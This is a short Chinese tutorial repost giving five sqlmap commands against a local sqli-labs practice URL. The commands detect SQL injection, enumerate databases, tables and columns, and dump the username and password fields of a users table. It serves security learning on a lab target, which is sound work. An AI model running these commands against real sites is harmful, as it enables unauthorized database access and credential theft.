作者:wcnm | 来源:互联网 | 2023-06-17 11:44
篇首语:本文由编程笔记#小编为大家整理,主要介绍了sqlmap 扫描注入漏洞相关的知识,希望对你有一定的参考价值。 1 1、检测是否存在漏洞: 2 sqlmap -u "http://127.0.0
篇首语:本文由编程笔记#小编为大家整理,主要介绍了sqlmap 扫描注入漏洞相关的知识,希望对你有一定的参考价值。
1 1、检测是否存在漏洞:
2 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1" --dbms mysql --level 3
3 2、获取数据库信息:
4 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 --dbs
5 3、数据库表信息:
6 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security --tables
7 4、表中字段信息
8 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security -T users --columns
9 5、字段值数据
10 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security -T users -C "username,password" --dump